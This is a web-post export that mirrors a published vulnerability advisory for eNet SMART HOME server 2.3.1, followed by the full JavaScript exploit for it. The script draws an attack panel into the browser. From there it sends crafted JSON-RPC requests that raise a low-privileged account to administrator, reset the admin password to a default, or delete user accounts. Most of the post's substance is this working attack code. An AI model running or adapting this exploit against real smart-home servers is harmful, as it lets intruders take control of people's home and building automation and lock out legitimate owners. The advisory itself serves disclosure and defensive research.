{"id":41059,"date":"2026-02-16T12:46:44","date_gmt":"2026-02-16T12:46:44","guid":{"rendered":"http:\/\/localhost\/?p=41059"},"modified":"2026-02-16T12:46:44","modified_gmt":"2026-02-16T12:46:44","slug":"enet-smart-home-server-231-remote-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41059","title":{"rendered":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705"},"content":{"rendered":"

{“lastseen”:”2026-02-16T18:13:24″,”description”:”The eNet Smart Home system suffers from a privilege escalation vulnerability due to insufficient authorization checks in the JSON-RPC endpoint for user management. A low-privileged user, can exploit the setUserGroup method by sending a crafted POST…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:215705″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”\/*\\n \\n eNet SMART HOME server 2.3.1 (setUserGroup) Remote Privilege Escalation\\n \\n \\n Vendor: Gira Giersiepen GmbH \\u0026 Co. KG | ALBRECHT JUNG GmbH \\u0026 Co. KG | Insta GmbH\\n Product web page: https:\/\/www.enet-smarthome.com\\n Affected version: 2.3.1 (46841)\\n 2.2.1 (46056)\\n \\n Summary: Two German specialists in building systems technology are jointly bringing\\n a new, wireless-based smart home system to the market. Gira and JUNG are the companies\\n behind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing\\n the system. All three of us are old hands when it comes to building automation, and\\n have a history of connecting buildings in an intelligent way that goes back as far as\\n the 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and\\n founded EIBA (now known as KNX). KNX is the first open global standard for home and\\n building automation. Through KNX, we have decisively shaped the development of intelligent\\n building systems technology \u2013 and this wealth of experience has now come together in\\n eNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and\\n offers end customers the basis for an easy-to-use and secure Smart Home and installation\\n engineers easily understandable and professional commissioning of the system.\\n \\n Desc: The eNet Smart Home system suffers from a privilege escalation vulnerability due\\n to insufficient authorization checks in the JSON-RPC endpoint for user management. A\\n low-privileged user, can exploit the \\”setUserGroup\\” method by sending a crafted POST\\n request to \/jsonrpc\/management, specifying their own username and elevating it to the\\n \\”UG_ADMIN\\” group. This bypasses intended access controls, granting the attacker administrative\\n capabilities such as modifying device configurations, network settings, and potentially\\n compromising the entire smart home ecosystem.\\n \\n Tested on: GNU\/Linux 4.4.15 (ARMv7 revision 5)\\n Jetty(9.2.z-SNAPSHOT)\\n \\n \\n Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\n @zeroscience\\n \\n \\n Advisory ID: ZSL-2026-5975\\n Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2026-5975.php\\n \\n \\n 07.02.2026\\n \\n *\/\\n \\n \\n const existingContainer = document.getElementById(‘exploitSnippet’);\\n if (existingContainer) existingContainer.remove();\\n \\n const currentProtocol = window.location.protocol.slice(0, -1);\\n const currentHost = window.location.hostname;\\n const currentPort = window.location.port || (currentProtocol === ‘https’ ? ‘443’ : ’80’);\\n \\n const urlParams = new URLSearchParams(window.location.search);\\n let defaultIcp = urlParams.get(‘icp’) || ”;\\n \\n const formHtml = `\\n \\u003cdiv id=\\”exploitSnippet\\”\\n style=\\”position: fixed;\\n bottom: 20px;\\n right: 20px;\\n width: 320px;\\n background: #2f343a;\\n color: #e4e7eb;\\n padding: 20px;\\n border: 1px solid #4a5560;\\n border-radius: 8px;\\n z-index: 9999;\\n overflow-y: auto;\\n max-height: 80vh;\\n font-family: Arial, sans-serif;\\n font-size: 14px;\\”\\u003e\\n \\n \\u003ch3 style=\\”margin-top: 0;\\n color: #cfd8e3;\\”\\u003e\\n eNet SMART HOME – DRE Exploit\\n \\u003c\/h3\\u003e\\n \\n \\u003clabel\\u003eProtocol:\\u003c\/label\\u003e\\n \\u003cselect id=\\”protocol\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\u003coption value=\\”https\\”\\n ${currentProtocol === ‘https’ ? ‘selected’ : ”}\\u003e\\n https:\/\/\\n \\u003c\/option\\u003e\\n \\u003coption value=\\”http\\”\\n ${currentProtocol === ‘http’ ? ‘selected’ : ”}\\u003e\\n http:\/\/\\n \\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\n \\u003clabel\\u003eHost\/IP:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”host\\”\\n value=\\”${currentHost}\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\n \\u003clabel\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”port\\”\\n value=\\”${currentPort}\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\n \\u003clabel\\u003eICP:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”icp\\”\\n value=\\”${defaultIcp}\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\n \\u003clabel\\u003eAction:\\u003c\/label\\u003e\\n \\u003cselect id=\\”action\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\u003coption value=\\”elevate\\”\\u003eElevate Privileges\\u003c\/option\\u003e\\n \\u003coption value=\\”reset\\”\\u003eReset Password\\u003c\/option\\u003e\\n \\u003coption value=\\”delete\\”\\u003eDelete User\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\n \\u003cdiv id=\\”elevateFields\\”\\u003e\\n \\u003clabel\\u003eUser Name:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”userName\\”\\n value=\\”zeroscience\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\n \\u003clabel\\u003eUser Group:\\u003c\/label\\u003e\\n \\u003cselect id=\\”userGroup\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\u003coption value=\\”UG_USER\\”\\u003eUG_USER (lower privs)\\u003c\/option\\u003e\\n \\u003coption value=\\”UG_ADMIN\\”\\u003eUG_ADMIN\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv id=\\”resetFields\\” style=\\”display: none;\\”\\u003e\\n \\u003clabel\\u003eUser Name:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”resetUserName\\”\\n value=\\”admin\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\n \\u003clabel\\u003eDefault Password:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”defaultPassword\\”\\n value=\\”12345678\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv id=\\”deleteFields\\” style=\\”display: none;\\”\\u003e\\n \\u003clabel\\u003eUser Name:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”deleteUserName\\”\\n value=\\”zeroscience\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003clabel\\u003eRequest ID:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\”\\n id=\\”requestId\\”\\n value=\\”14\\”\\n style=\\”width: 100%;\\n margin-bottom: 12px;\\n background: #3b4148;\\n color: #e4e7eb;\\n border: 1px solid #56606b;\\n border-radius: 4px;\\n padding: 6px;\\”\\u003e\\n \\n \\u003cbutton id=\\”runButton\\”\\n type=\\”button\\”\\n style=\\”background: #3a6ea5;\\n color: #ffffff;\\n border: 1px solid #2e5d8c;\\n padding: 8px 16px;\\n border-radius: 4px;\\n cursor: pointer;\\n margin-right: 10px;\\”\\u003e\\n RUN\\n \\u003c\/button\\u003e\\n \\n \\u003cbutton id=\\”closeButton\\”\\n type=\\”button\\”\\n style=\\”background: #5c6773;\\n color: #ffffff;\\n border: 1px solid #49525c;\\n padding: 8px 16px;\\n border-radius: 4px;\\n cursor: pointer;\\”\\u003e\\n Close\\n \\u003c\/button\\u003e\\n \\n \\u003cdiv id=\\”responseOutput\\”\\n style=\\”margin-top: 12px;\\n white-space: pre-wrap;\\n background: #252a30;\\n color: #d6dde5;\\n padding: 10px;\\n border: 1px solid #4a5560;\\n border-radius: 4px;\\n max-height: 200px;\\n overflow-y: auto;\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003c\/div\\u003e\\n `;\\n \\n document.body.insertAdjacentHTML(‘beforeend’, formHtml);\\n \\n const actionSelect = document.getElementById(‘action’);\\n const runButton = document.getElementById(‘runButton’);\\n const closeButton = document.getElementById(‘closeButton’);\\n const responseOutput = document.getElementById(‘responseOutput’);\\n const elevateFields = document.getElementById(‘elevateFields’);\\n const resetFields = document.getElementById(‘resetFields’);\\n const deleteFields = document.getElementById(‘deleteFields’);\\n const requestIdInput = document.getElementById(‘requestId’);\\n \\n const updateFields = (value) =\\u003e {\\n elevateFields.style.display = value === ‘elevate’ ? ‘block’ : ‘none’;\\n resetFields.style.display = value === ‘reset’ ? ‘block’ : ‘none’;\\n deleteFields.style.display = value === ‘delete’ ? ‘block’ : ‘none’;\\n \\n let defaultId = ’14’;\\n if (value === ‘reset’) defaultId = ’15’;\\n if (value === ‘delete’) defaultId = ‘6’;\\n requestIdInput.value = defaultId;\\n };\\n \\n actionSelect.addEventListener(‘change’, (e) =\\u003e updateFields(e.target.value));\\n \\n updateFields(actionSelect.value);\\n \\n runButton.addEventListener(‘click’, () =\\u003e {\\n const protocol = document.getElementById(‘protocol’).value;\\n const host = document.getElementById(‘host’).value;\\n const port = document.getElementById(‘port’).value;\\n const icp = document.getElementById(‘icp’).value;\\n const action = actionSelect.value;\\n const requestId = requestIdInput.value;\\n \\n if (!icp) {\\n responseOutput.textContent = ‘Error: ICP is required.’;\\n console.error(‘ICP is required.’);\\n return;\\n }\\n \\n responseOutput.textContent = ‘Loading…’;\\n \\n let method, params;\\n if (action === ‘elevate’) {\\n method = ‘setUserGroup’;\\n params = {\\n userName: document.getElementById(‘userName’).value,\\n userGroup: document.getElementById(‘userGroup’).value\\n };\\n } else if (action === ‘reset’) {\\n method = ‘resetUserPassword’;\\n params = {\\n userName: document.getElementById(‘resetUserName’).value,\\n defaultPassword: document.getElementById(‘defaultPassword’).value\\n };\\n } else if (action === ‘delete’) {\\n method = ‘deleteUserAccount’;\\n params = {\\n userName: document.getElementById(‘deleteUserName’).value\\n };\\n }\\n \\n const baseUrl = `${protocol}:\/\/${host}:${port}`;\\n const customReferer = `${baseUrl}\/serverconfiguration.html?icp=${icp}#Usermanagement`;\\n const fetchUrl = `${baseUrl}\/jsonrpc\/management`;\\n \\n const body = JSON.stringify({\\n \\”jsonrpc\\”: \\”2.0\\”,\\n \\”method\\”: method,\\n \\”params\\”: params,\\n \\”id\\”: requestId\\n });\\n \\n console.log(‘Sending request to:’, fetchUrl);\\n console.log(‘With Referer:’, customReferer);\\n console.log(‘Body:’, body);\\n \\n const timeoutPromise = new Promise((_, reject) =\\u003e \\n setTimeout(() =\\u003e reject(new Error(‘Request timed out’)), 10000)\\n );\\n \\n Promise.race([timeoutPromise, fetch(fetchUrl, {\\n method: ‘POST’,\\n headers: {\\n ‘Content-Type’: ‘application\/json; charset=utf-8’,\\n ‘Accept-Encoding’: ‘gzip, deflate, br’,\\n ‘Accept-Language’: ‘ku-MK,ku;j=1.7’,\\n ‘Accept’: ‘*\/*’\\n },\\n body: body,\\n credentials: ‘include’,\\n referrer: customReferer,\\n referrerPolicy: ‘unsafe-url’\\n })])\\n .then(response =\\u003e {\\n if (response instanceof Error) throw response;\\n console.log(‘Response status:’, response.status);\\n if (!response.ok) {\\n throw new Error(`HTTP error! Status: ${response.status}`);\\n }\\n return response.json();\\n })\\n .then(data =\\u003e {\\n const successMsg = `Success: ${JSON.stringify(data, null, 2)}`;\\n responseOutput.textContent = successMsg;\\n console.log(successMsg);\\n setTimeout(() =\\u003e location.reload(), 2000);\\n })\\n .catch(error =\\u003e {\\n const errorMsg = `Error: ${error.message}`;\\n responseOutput.textContent = errorMsg;\\n console.error(errorMsg);\\n });\\n });\\n \\n closeButton.addEventListener(‘click’, () =\\u003e {\\n console.log(‘Closing form…’);\\n const container = document.getElementById(‘exploitSnippet’);\\n if (container) {\\n container.remove();\\n console.log(‘Form closed.’);\\n } else {\\n console.log(‘Form not found.’);\\n }\\n });”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215705″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215705\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-16T18:13:24″,”description”:”The eNet Smart Home system suffers from a privilege escalation vulnerability due to insufficient authorization checks in the JSON-RPC endpoint for user management. A low-privileged…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41059","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41059\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-16T18:13:24″,”description”:”The eNet Smart Home system suffers from a privilege escalation vulnerability due to insufficient authorization checks in the JSON-RPC endpoint for user management. A low-privileged...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41059\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-16T12:46:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41059#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41059\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705\",\"datePublished\":\"2026-02-16T12:46:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41059\"},\"wordCount\":1977,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41059#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41059\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41059\",\"name\":\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-16T12:46:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41059#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41059\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41059#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41059","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705 - zero redgem","og_description":"{“lastseen”:”2026-02-16T18:13:24″,”description”:”The eNet Smart Home system suffers from a privilege escalation vulnerability due to insufficient authorization checks in the JSON-RPC endpoint for user management. A low-privileged...","og_url":"https:\/\/zero.redgem.net\/?p=41059","og_site_name":"zero redgem","article_published_time":"2026-02-16T12:46:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41059#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41059"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705","datePublished":"2026-02-16T12:46:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41059"},"wordCount":1977,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41059#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41059","url":"https:\/\/zero.redgem.net\/?p=41059","name":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-16T12:46:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41059#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41059"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41059#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Remote Privilege Escalation_PACKETSTORM:215705"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41059","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41059"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41059\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41059"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41059"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41059"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}